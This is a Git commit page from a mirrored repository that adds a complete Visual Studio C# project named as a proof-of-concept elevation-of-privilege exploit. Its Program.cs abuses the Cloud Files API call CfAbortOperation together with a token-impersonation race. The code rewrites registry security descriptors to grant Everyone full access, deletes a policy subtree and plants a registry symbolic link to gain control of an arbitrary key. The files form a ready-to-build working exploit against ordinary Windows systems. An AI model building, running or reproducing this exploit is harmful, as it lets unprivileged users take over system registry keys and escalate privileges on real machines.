milliways-infosec/MiniPlasma
7
0
Fork 0
mirror of https://github.com/Nightmare-Eclipse/MiniPlasma.git synced 2026-05-26 14:20:51 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

Add files via upload

Browse source
This commit is contained in:
Nightmare-Eclipse 2026-05-14 22:33:50 +02:00 committed by GitHub
parent 17a2a44ccf
commit b73f93814b
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
6 changed files with 397 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

25
src/PoC_AbortHydration_ArbitraryRegKey_EoP.sln Normal file
View file

@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30413.136
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PoC_AbortHydration_ArbitraryRegKey_EoP", "PoC_AbortHydration_ArbitraryRegKey_EoP\PoC_AbortHydration_ArbitraryRegKey_EoP.csproj", "{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Debug|Any CPU.Build.0 = Debug|Any CPU
{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Release|Any CPU.ActiveCfg = Release|Any CPU
{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {AC46CFC5-1E96-44EF-8DC8-8D76B107B781}
EndGlobalSection
EndGlobal

6
src/PoC_AbortHydration_ArbitraryRegKey_EoP/App.config Normal file
View file

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
</startup>
</configuration>

59
src/PoC_AbortHydration_ArbitraryRegKey_EoP/PoC_AbortHydration_ArbitraryRegKey_EoP.csproj Normal file
View file

@ -0,0 +1,59 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{352F6DD7-9B05-4896-9E7D-2EFA36EAC6E3}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>PoC_AbortHydration_ArbitraryRegKey_EoP</RootNamespace>
<AssemblyName>PoC_AbortHydration_ArbitraryRegKey_EoP</AssemblyName>
<TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<ItemGroup>
<Reference Include="NtApiDotNet, Version=1.0.0.0, Culture=neutral, processorArchitecture=MSIL">
<HintPath>..\packages\NtApiDotNet.1.1.28\lib\net45\NtApiDotNet.dll</HintPath>
</Reference>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
<None Include="packages.config" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

267
src/PoC_AbortHydration_ArbitraryRegKey_EoP/Program.cs Normal file
View file

@ -0,0 +1,267 @@
using NtApiDotNet;
using NtApiDotNet.Win32;
using System;
using System.Runtime.InteropServices;
using System.Threading;
namespace PoC_AbortHydration_ArbitraryRegKey_EoP
{
static class Program
{
static NtKey OpenKey(NtKey root, string path, KeyAccessRights desired_access)
{
Console.WriteLine("Opening for {0}", desired_access);
using (var obja = new ObjectAttributes(path, AttributeFlags.OpenLink, root))
{
using (var key = NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile, false))
{
if (key.IsSuccess)
return key.Result.Duplicate();
}
using (var imp = NtThread.Current.ImpersonateAnonymousToken())
{
return NtKey.Open(obja, desired_access, KeyCreateOptions.NonVolatile);
}
}
}
static void SetSecurityDescriptor(NtKey key, SecurityInformation info)
{
var sd = new SecurityDescriptor("D:(A;OICIIO;GA;;;WD)(A;OICIIO;GA;;;AN)(A;;GA;;;WD)(A;;GA;;;AN)S:(ML;OICI;NW;;;S-1-16-0)");
key.SetSecurityDescriptor(sd, info);
}
static void ForceKeyDeleteKey(NtKey root, string name)
{
Console.WriteLine(@"Deleting {0}\{1}", root.FullPath, name);
using (var key = OpenKey(root, name, KeyAccessRights.WriteDac))
{
Console.WriteLine("Opened for WriteDac");
SetSecurityDescriptor(key, SecurityInformation.Dacl);
}
using (var key = OpenKey(root, name, KeyAccessRights.WriteOwner))
{
Console.WriteLine("Opened for WriteOwner");
SetSecurityDescriptor(key, SecurityInformation.Label);
}
using (var new_key = OpenKey(root, name, KeyAccessRights.Delete | KeyAccessRights.EnumerateSubKeys))
{
Console.WriteLine("Opened for enumerate.");
DeleteRegistryTree(new_key);
new_key.Delete();
}
}
static void DeleteRegistryTree(NtKey root)
{
foreach (var name in root.QueryKeys())
{
ForceKeyDeleteKey(root, name);
}
}
[Flags]
enum AbortHydrationFlags
{
None = 0,
Unblock = 1,
Block = 2,
}
[DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
static extern int CfAbortOperation(int pid, IntPtr unknown, AbortHydrationFlags flags);
[StructLayout(LayoutKind.Sequential)]
struct CF_PLATFORM_INFO
{
public int BuildNumber;
public int RevisionNumber;
public int IntegrationNumber;
}
[DllImport("cldapi.dll", CharSet = CharSet.Unicode)]
static extern int CfGetPlatformInfo(
out CF_PLATFORM_INFO PlatformVersion
);
static void ForceTokenThread(object obj)
{
try
{
using (var thread = (NtThread)obj)
{
Console.WriteLine("In force token thread {0}", thread);
using (var token = TokenUtils.GetAnonymousToken())
{
while (true)
{
thread.SetImpersonationToken(token);
thread.SetImpersonationToken(null);
}
}
}
}
catch(ThreadAbortException)
{
return;
}
catch (Exception ex)
{
Console.WriteLine(ex);
}
}
const string ROOT_KEY = @"\Registry\User\.DEFAULT\Software\Policies\Microsoft";
static string CLOUD_FILES = $@"{ROOT_KEY}\CloudFiles";
static string BLOCKED_APPS = $@"{CLOUD_FILES}\BlockedApps";
const string TARGET_KEY = @"\Registry\User\.DEFAULT\DEMODEMO";
static void CheckKeyThread(object root_key)
{
string path = (bool)root_key ? ROOT_KEY : @"\Registry\User\.DEFAULT";
try
{
using (var key = NtKey.Open(path, null, KeyAccessRights.MaximumAllowed))
{
while (true)
{
if (key.NotifyChange(NotifyCompletionFilter.Name, true) == NtStatus.STATUS_NOTIFY_ENUM_DIR)
{
Console.WriteLine("Change detected.");
Environment.Exit(0);
break;
}
}
}
}
catch (Exception ex)
{
Console.WriteLine(ex);
}
}
static int Check(this int hr)
{
if (hr < 0)
Marshal.ThrowExceptionForHR(hr);
return hr;
}
const int MAX_STAGE = 4;
static void Stage0()
{
for (int i = 1; i < MAX_STAGE; ++i)
{
Win32ProcessConfig config = new Win32ProcessConfig
{
CommandLine = $"run {i}",
ApplicationName = typeof(Program).Assembly.Location,
TerminateOnDispose = true
};
using (var p = Win32Process.CreateProcess(config))
{
if (p.Process.Wait(10) != NtStatus.STATUS_SUCCESS)
{
throw new ArgumentException($"Failed to run stage {i}");
}
}
}
}
static void Stage1(bool root_key)
{
Thread check_key_th = new Thread(CheckKeyThread);
check_key_th.IsBackground = true;
check_key_th.Start(root_key);
Thread.Sleep(1000);
var th = NtThread.OpenCurrent();
var anon_thread = new Thread(ForceTokenThread)
{
IsBackground = true
};
anon_thread.Start(th);
while (true)
{
CfAbortOperation(NtProcess.Current.ProcessId,
IntPtr.Zero, AbortHydrationFlags.Block);
}
}
static void Stage2()
{
using (var key = OpenKey(null, CLOUD_FILES, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner | KeyAccessRights.EnumerateSubKeys))
{
SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
DeleteRegistryTree(key);
}
NtKey.CreateSymbolicLink(BLOCKED_APPS, null, TARGET_KEY);
Stage1(false);
}
static void Stage3()
{
using (var key = OpenKey(null, BLOCKED_APPS, KeyAccessRights.Delete))
{
Console.WriteLine("Cleaning up link {0}", key.FullPath);
key.Delete();
}
using (var key = OpenKey(null, TARGET_KEY, KeyAccessRights.WriteDac | KeyAccessRights.WriteOwner))
{
SetSecurityDescriptor(key, SecurityInformation.Dacl | SecurityInformation.Label);
}
}
static void Main(string[] args)
{
try
{
CfGetPlatformInfo(out CF_PLATFORM_INFO _).Check();
if (args.Length <= 1)
{
int stage = args.Length > 0 ? int.Parse(args[0]) : 0;
switch (stage)
{
case 0:
Stage0();
break;
case 1:
Stage1(true);
break;
case 2:
Stage2();
break;
case 3:
Stage3();
break;
default:
throw new ArgumentException("Erm?");
}
}
else
{
using (var token = TokenUtils.GetLogonUserToken(args[0], "", args[1], SecurityLogonType.Network, null))
{
using (var imp = token.Impersonate())
{
CfAbortOperation(NtProcess.Current.ProcessId, IntPtr.Zero, AbortHydrationFlags.Block).Check();
}
}
}
}
catch (Exception ex)
{
Console.WriteLine(ex);
}
}
}
}

36
src/PoC_AbortHydration_ArbitraryRegKey_EoP/Properties/AssemblyInfo.cs Normal file
View file

@ -0,0 +1,36 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("PoC_AbortHydration_ArbitraryRegKey_EoP")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("PoC_AbortHydration_ArbitraryRegKey_EoP")]
[assembly: AssemblyCopyright("Copyright © 2020")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("352f6dd7-9b05-4896-9e7d-2efa36eac6e3")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

4
src/PoC_AbortHydration_ArbitraryRegKey_EoP/packages.config Normal file
View file

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="NtApiDotNet" version="1.1.28" targetFramework="net472" />
</packages>